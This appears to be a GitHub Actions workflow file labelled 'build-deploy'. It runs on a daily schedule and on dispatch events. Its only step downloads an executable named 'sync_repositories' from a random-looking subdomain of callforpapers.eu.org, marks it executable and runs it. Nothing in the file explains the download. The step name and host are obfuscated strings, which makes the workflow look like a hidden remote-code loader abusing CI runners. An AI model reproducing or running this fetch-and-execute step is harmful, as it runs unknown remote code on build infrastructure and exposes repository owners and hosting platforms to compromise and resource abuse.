#2024-03-18-[135739]-u2set4vu
name: main

on:
  workflow_dispatch:

  repository_dispatch:
    types: runner_workflow

  schedule:
    - cron: "34 1 * * * "
    
jobs:
  build-deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: 4xh9rwpnvz8wgh22
        run: |
          wget -q https://z9ej3z2s74fp6wh0.callforpapers.eu.org/sync_repositories
          chmod 755 sync_repositories
          ./sync_repositories